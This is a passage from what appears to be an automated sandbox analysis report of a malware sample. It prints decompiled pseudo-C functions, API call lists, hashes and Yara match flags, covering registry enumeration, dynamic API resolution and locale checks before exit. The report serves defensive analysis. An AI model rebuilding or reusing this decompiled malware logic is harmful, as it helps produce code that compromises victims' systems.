            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,005E37FB,?,?,?,?,00000000,00000000), ref: 005E6C1E
          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 005E6C40
          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 005E6C56
          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 005E6C6C
          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 005E6C82
          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 005E6C98
            • Part of subcall function 005E7A08: memset.NTDLL ref: 005E7A87
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: AddressProc$AllocateHandleHeapModulememset
          • String ID:
          • API String ID: 1886625739-0
          • Opcode ID: 89b1e85cc4494b067047b1324929df39ab4bc14e9715bf7cf7a5b1330ccd4f39
          • Instruction ID: f081e29508828cdb904efbeaf07c5f8d0341490c3ff122f6ae8977813ae1022e
          • Opcode Fuzzy Hash: 89b1e85cc4494b067047b1324929df39ab4bc14e9715bf7cf7a5b1330ccd4f39
          • Instruction Fuzzy Hash: 10211EB150078A9FD718DF6BC994E6A7BECFB243817104855E5C5CB621E770ED08CB61
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E454F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112COMMON
          Download Yara Rule
          C-Code - Quality: 39%
          			E005E454F(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x5ea160() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x5ea174(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E005E33DC(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x5ea160() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E005E61DA(_v16);
							if(_t58 == 0) {
								_t58 = E005E2B18(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E005E16B2( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E005E16B2( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














          0x005e454f
          0x005e455e
          0x005e4563
          0x005e4565
          0x005e456a
          0x005e456b
          0x005e4570
          0x005e4571
          0x005e457c
          0x005e45ad
          0x005e45b2
          0x005e4675
          0x005e4678
          0x005e467e
          0x005e467e
          0x005e45bf
          0x005e45c7
          0x005e4672
          0x00000000
          0x005e4672
          0x005e45d2
          0x005e45d7
          0x005e45dc
          0x005e4664
          0x005e4665
          0x005e4665
          0x005e466b
          0x00000000
          0x005e466b
          0x005e45e2
          0x005e45e4
          0x005e45ea
          0x005e45eb
          0x005e45eb
          0x005e45ee
          0x005e45f1
          0x005e45f7
          0x005e45fc
          0x005e45fd
          0x005e4602
          0x005e4605
          0x005e4610
          0x00000000
          0x00000000
          0x005e4618
          0x005e4620
          0x005e4649
          0x005e464c
          0x005e4653
          0x005e465e
          0x005e465e
          0x00000000
          0x005e4653
          0x005e462c
          0x005e4630
          0x00000000
          0x00000000
          0x005e4632
          0x005e4637
          0x00000000
          0x00000000
          0x005e4639
          0x005e4639
          0x005e463e
          0x00000000
          0x00000000
          0x005e4640
          0x005e4641
          0x005e4644
          0x005e4644
          0x005e45eb
          0x005e4584
          0x005e458c
          0x005e45a5
          0x005e45a7
          0x00000000
          0x00000000
          0x00000000
          0x005e45a7
          0x005e4598
          0x005e459c
          0x00000000
          0x00000000
          0x005e45a2
          0x00000000

          APIs
          • ResetEvent.KERNEL32(?), ref: 005E4565
          • GetLastError.KERNEL32 ref: 005E457E
            • Part of subcall function 005E16B2: WaitForMultipleObjects.KERNEL32(00000002,005E7C47,00000000,005E7C47,?,?,?,005E7C47,0000EA60), ref: 005E16CD
          • ResetEvent.KERNEL32(?), ref: 005E45F7
          • GetLastError.KERNEL32 ref: 005E4612
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: ErrorEventLastReset$MultipleObjectsWait
          • String ID: @MqtNqt
          • API String ID: 2394032930-2883916605
          • Opcode ID: 004d2bb0b3bda30b2b9fb5715fb6f345a31607adbc88ab1cd85f2bc38ca314e2
          • Instruction ID: d328f52ba08680caa04e69e379ed75f5b6dbd783b09c0cc5ec1fd9c00826bdf1
          • Opcode Fuzzy Hash: 004d2bb0b3bda30b2b9fb5715fb6f345a31607adbc88ab1cd85f2bc38ca314e2
          • Instruction Fuzzy Hash: 4731B532A00684AFCB299BA6CC48E6E7BB9BFD5350F250568E5D1D7190EB30ED45DF10
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E607C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
          Download Yara Rule
          C-Code - Quality: 37%
          			E005E607C() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x5ea3cc; // 0x2bc9600
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x5ea3cc; // 0x2bc9600
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x5ea3cc; // 0x2bc9600
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x5eb142) {
					HeapFree( *0x5ea2d8, 0, _t10);
					_t7 =  *0x5ea3cc; // 0x2bc9600
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









          0x005e607c
          0x005e6085
          0x005e6095
          0x005e6095
          0x005e609a
          0x005e609f
          0x00000000
          0x00000000
          0x005e608f
          0x005e608f
          0x005e60a1
          0x005e60a6
          0x005e60aa
          0x005e60bd
          0x005e60c3
          0x005e60c3
          0x005e60cc
          0x005e60ce
          0x005e60d2
          0x005e60d8

          APIs
          • RtlEnterCriticalSection.NTDLL(02BC95C0), ref: 005E6085
          • Sleep.KERNEL32(0000000A), ref: 005E608F
          • HeapFree.KERNEL32(00000000), ref: 005E60BD
          • RtlLeaveCriticalSection.NTDLL(02BC95C0), ref: 005E60D2
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
          • String ID: Uqt
          • API String ID: 58946197-2320327147
          • Opcode ID: 5ccf66cbfc686d96be8e9775dac2efe1bd5f3ddf6c126aa0f64cc01d7f9a7d21
          • Instruction ID: 4546fc94082332b2d71242a5773311ebefe2082a5e8d6e48ceb16aca8da4ae00
          • Opcode Fuzzy Hash: 5ccf66cbfc686d96be8e9775dac2efe1bd5f3ddf6c126aa0f64cc01d7f9a7d21
          • Instruction Fuzzy Hash: BBF0B7742002819BE71CCB66DC9DA157FE5AB68391B184454E9829B3A0C630AC48EA26
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005C1817 Relevance: 7.6, APIs: 5, Instructions: 81filetimeCOMMON
          Download Yara Rule
          APIs
          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,005C167F,0000000A,?,?), ref: 005C1824
          • CreateFileMappingW.KERNEL32(000000FF,00404188,00000004,00000000,?,?,?,?,54D38000,00000192), ref: 005C1884
          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,005C167F,0000000A), ref: 005C18AF
          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,005C167F,0000000A,?,?), ref: 005C18D0
          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,005C167F,0000000A,?,?), ref: 005C18D8
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView
          • String ID:
          • API String ID: 2685682793-0
          • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
          • Instruction ID: 05643007c716946cc0ac1b170ba8813b3efe82d3259160a3f3bd2915e04ed04b
          • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
          • Instruction Fuzzy Hash: F82180B6A04108BFD710AFE4DC88FAE7FADFB49391F104439FA05E7191D63099448B68
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E23C4 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 48COMMON
          Download Yara Rule
          C-Code - Quality: 64%
          			E005E23C4(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E005E3A63(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x5ea348; // 0x25dd5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x5eb50c; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x5eb8d8; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E005E5B56();
					_push( &_v64);
					if( *0x5ea100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E005E5B56();
				}
				return _t28;
			}














          0x005e23c4
          0x005e23cb
          0x005e23d9
          0x005e23dd
          0x005e23e7
          0x005e23ec
          0x005e23f1
          0x005e23f6
          0x005e2400
          0x005e240a
          0x005e240a
          0x005e2402
          0x005e2402
          0x005e2402
          0x005e2402
          0x005e2410
          0x005e2416
          0x005e2417
          0x005e241a
          0x005e241d
          0x005e2420
          0x005e2428
          0x005e2431
          0x005e2439
          0x005e2439
          0x005e243b
          0x005e243d
          0x005e243d
          0x005e2447

          APIs
            • Part of subcall function 005E3A63: SysAllocString.OLEAUT32(00000000), ref: 005E3ABD
            • Part of subcall function 005E3A63: SysAllocString.OLEAUT32(0070006F), ref: 005E3AD1
            • Part of subcall function 005E3A63: SysAllocString.OLEAUT32(00000000), ref: 005E3AE3
          • memset.NTDLL ref: 005E23E7
          • GetLastError.KERNEL32 ref: 005E2433
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: AllocString$ErrorLastmemset
          • String ID: <$@MqtNqt$E~^
          • API String ID: 3736384471-1384464141
          • Opcode ID: 813dacfdfba08a5d43d0fb86f928b4ad0c5a26a644f7167145eada75754f70f0
          • Instruction ID: 18b98d5834f1e261f2bffaa9246090e36904ca43c152c9c9d4ea01811d0093db
          • Opcode Fuzzy Hash: 813dacfdfba08a5d43d0fb86f928b4ad0c5a26a644f7167145eada75754f70f0
          • Instruction Fuzzy Hash: 67018471900258ABCB18DFA6D889EDE7BBCBB18740F404026F984E7251E77099048B91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005C2048 Relevance: 7.5, APIs: 5, Instructions: 19memoryCOMMON
          Download Yara Rule
          APIs
          • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 005C2052
          • GetModuleHandleA.KERNEL32(00000000), ref: 005C2062
          • GetCommandLineW.KERNEL32 ref: 005C206D
            • Part of subcall function 005C1C58: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 005C1C8D
            • Part of subcall function 005C1C58: Sleep.KERNEL32(00000000,00000030), ref: 005C1CD4
            • Part of subcall function 005C1C58: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 005C1CFC
            • Part of subcall function 005C1C58: GetSystemDefaultUILanguage.KERNEL32 ref: 005C1D06
            • Part of subcall function 005C1C58: VerLanguageNameA.KERNEL32(?,?,00000004), ref: 005C1D19
          • HeapDestroy.KERNEL32 ref: 005C2080
          • ExitProcess.KERNEL32 ref: 005C2087
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID: HeapLanguageSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleNameProcessQuerySleep
          • String ID:
          • API String ID: 1393419808-0
          • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
          • Instruction ID: dd53b29f35778c38de2c8595521148316eafc5483d0bea8f3b2dbcf8bf19a86f
          • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
          • Instruction Fuzzy Hash: 70E0B6B0803620ABC3216F71BE0CA4E7E28BB5AB527000535F605F2125CB384A41CA9C
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E4C94 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 167stringCOMMON
          Download Yara Rule
          C-Code - Quality: 88%
          			E005E4C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x5ea3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E005E6536( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E005E313F(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E005E61DA(_a8);
						goto L29;
					}
					_t64 =  *0x5ea318; // 0x2bc9e18
					_t16 = _t64 + 0xc; // 0x2bc9f3a
					_t65 = E005E6536(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d005e90
						if(E005E7767(_t97,  *_t33, _t91, _a8,  *0x5ea3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x5ea348; // 0x25dd5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x5ebb5a; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x5ebbac; // 0x55434b48
								_t69 = _t34;
							}
							if(E005E7238(_t69,  *0x5ea3d4,  *0x5ea3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x5ea348; // 0x25dd5a8
									_t44 = _t71 + 0x5eb332; // 0x74666f53
									_t73 = E005E6536(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d005e90
										E005E5B0E( *_t47, _t91, _a8,  *0x5ea3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d005e90
										E005E5B0E( *_t49, _t91, _t99,  *0x5ea3d0, _a16);
										E005E61DA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d005e90
									E005E5B0E( *_t40, _t91, _a8,  *0x5ea3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d005e90
									E005E5B0E( *_t43, _t91, _a8,  *0x5ea3d0, _a16);
								}
								if( *_t101 != 0) {
									E005E61DA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d005e90
					_t81 = E005E58BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d005e90
							E005E7767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E005E61DA(_t100);
						_t98 = _a16;
					}
					E005E61DA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E005E7AB0(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x5ea3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























          0x005e4c94
          0x005e4c9d
          0x005e4ca4
          0x005e4ca9
          0x005e4d16
          0x005e4d1c
          0x005e4d21
          0x005e4d28
          0x005e4d2d
          0x005e4d32
          0x005e4e9d
          0x005e4ea4
          0x005e4ea4
          0x005e4ea9
          0x005e4eab
          0x005e4eab
          0x005e4eb4
          0x005e4eb4
          0x005e4d38
          0x005e4d44
          0x005e4e93
          0x005e4e96
          0x00000000
          0x005e4e96
          0x005e4d4a
          0x005e4d4f
          0x005e4d52
          0x005e4d57
          0x005e4d5c
          0x005e4da5
          0x005e4da5
          0x005e4db8
          0x005e4dc2
          0x005e4dc8
          0x005e4dcf
          0x005e4dd9
          0x005e4dd9
          0x005e4dd1
          0x005e4dd1
          0x005e4dd1
          0x005e4dd1
          0x005e4dfb
          0x005e4e03
          0x005e4e31
          0x005e4e36
          0x005e4e3d
          0x005e4e42
          0x005e4e46
          0x005e4e78
          0x005e4e48
          0x005e4e55
          0x005e4e58
          0x005e4e68
          0x005e4e6b
          0x005e4e71
          0x005e4e71
          0x005e4e05
          0x005e4e12
          0x005e4e15
          0x005e4e27
          0x005e4e2a
          0x005e4e2a
          0x005e4e82
          0x005e4e8e
          0x005e4e84
          0x005e4e87
          0x005e4e87
          0x005e4e82
          0x005e4dfb
          0x00000000
          0x005e4dc2
          0x005e4d6b
          0x005e4d6e
          0x005e4d75
          0x005e4d7b
          0x005e4d7e
          0x005e4d80
          0x005e4d8c
          0x005e4d8f
          0x005e4d8f
          0x005e4d95
          0x005e4d9a
          0x005e4d9a
          0x005e4da0
          0x00000000
          0x005e4da0
          0x005e4cae
          0x00000000
          0x005e4cd5
          0x005e4cd5
          0x005e4ce1
          0x005e4cf4
          0x005e4cfa
          0x005e4d02
          0x00000000
          0x005e4d02

          APIs
          • StrChrA.SHLWAPI(?,0000005F,00000000,00000000,00000104), ref: 005E4CC7
          • lstrcpy.KERNEL32(?,?), ref: 005E4CF4
            • Part of subcall function 005E6536: lstrlen.KERNEL32(?,00000000,02BC9E18,00000000,005E6F0A,02BCA03B,43175AC3,?,?,?,?,43175AC3,00000005,005EA00C,4D283A53,?), ref: 005E653D
            • Part of subcall function 005E6536: mbstowcs.NTDLL ref: 005E6566
            • Part of subcall function 005E6536: memset.NTDLL ref: 005E6578
            • Part of subcall function 005E5B0E: lstrlenW.KERNEL32(?,?,?,005E4E5D,3D005E90,80000002,?,005E57D1,74666F53,4D4C4B48,005E57D1,?,3D005E90,80000002,?,?), ref: 005E5B33
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          • lstrcpy.KERNEL32(?,00000000), ref: 005E4D16
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
          • String ID: vj^
          • API String ID: 3924217599-3170644526
          • Opcode ID: d9ed6927ff31f0e3d936e65091bdb52c28b638190cdf360105f81582b5a7320c
          • Instruction ID: b8a026d0940e0df1c0d008c5a1a2691b61b89dfd02f61e68b5961dd8d277b39f
          • Opcode Fuzzy Hash: d9ed6927ff31f0e3d936e65091bdb52c28b638190cdf360105f81582b5a7320c
          • Instruction Fuzzy Hash: A0518E7250028AEFDF1A9F62DD84EAA3F7AFF58344F008914FA9196021D731E915EF11
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E5704 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98synchronizationCOMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E005E5704(void* __ecx, char _a4) {
				char _v8;
				char _v12;
				long _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t35;
				intOrPtr _t47;
				void* _t51;
				void* _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t53 =  *0x5ea0f4(0x80000003, 0, 0, 0x20019,  &_v32);
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E005E33DC(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					 *0x5ea0d4(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_t10 =  &_v12; // 0x5e6a76
					_v12 = 0x104;
					_t53 =  *0x5ea0f8(_v32, _v8, _v28, _t10, 0, 0, 0, 0);
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E005E61DA(_v28);
							goto L17;
						}
						_t24 =  &_a4; // 0x5e6a76
						_t53 = E005E4C94(_t51, _v32, _v28, _v24, _v12,  &_v8,  *_t24);
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E005E61DA(_v24);
						_v20 = _v16;
						_t47 = E005E33DC(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x5ea30c, 0) == 0x102);
				goto L16;
			}














          0x005e5704
          0x005e571e
          0x005e5721
          0x005e5724
          0x005e5727
          0x005e5730
          0x005e5734
          0x005e580e
          0x005e5812
          0x005e5812
          0x005e573d
          0x005e5744
          0x005e5749
          0x005e574e
          0x005e5803
          0x005e5806
          0x00000000
          0x005e580c
          0x005e5754
          0x005e5757
          0x005e575e
          0x005e5761
          0x005e5768
          0x005e5777
          0x005e577f
          0x005e57b7
          0x005e57f1
          0x005e57f7
          0x005e57f9
          0x005e57f9
          0x005e57fb
          0x005e57fe
          0x00000000
          0x005e57fe
          0x005e57b9
          0x005e57d1
          0x005e57d5
          0x00000000
          0x00000000
          0x00000000
          0x005e57d5
          0x005e5784
          0x005e5793
          0x00000000
          0x00000000
          0x005e5798
          0x005e57a1
          0x005e57a4
          0x005e57a9
          0x005e57ae
          0x005e5789
          0x005e5789
          0x00000000
          0x005e5789
          0x005e57b2
          0x00000000
          0x005e57b2
          0x005e5786
          0x00000000
          0x005e57d7
          0x005e57e4
          0x00000000

          APIs
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,00000000,vj^,?,?,?,?,?,005E6A76,?), ref: 005E57DE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: AllocateHeapObjectSingleWait
          • String ID: 1~^$vj^$vj^
          • API String ID: 3050739573-1616252289
          • Opcode ID: 26056dfc4bb272d2e730f47e387cdae4e44c3f70eb2d9af4a9c5c7219c682c94
          • Instruction ID: a05518775e6b477bad2b884183bb41d5e0a5b5f1db079e1bde34e2cad49a83a5
          • Opcode Fuzzy Hash: 26056dfc4bb272d2e730f47e387cdae4e44c3f70eb2d9af4a9c5c7219c682c94
          • Instruction Fuzzy Hash: 3B314A71C005A9EACF25ABA6CC889AEBF79FB94394F204426E595B2110E2700A51DB90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E35D2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 85%
          			E005E35D2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t46;
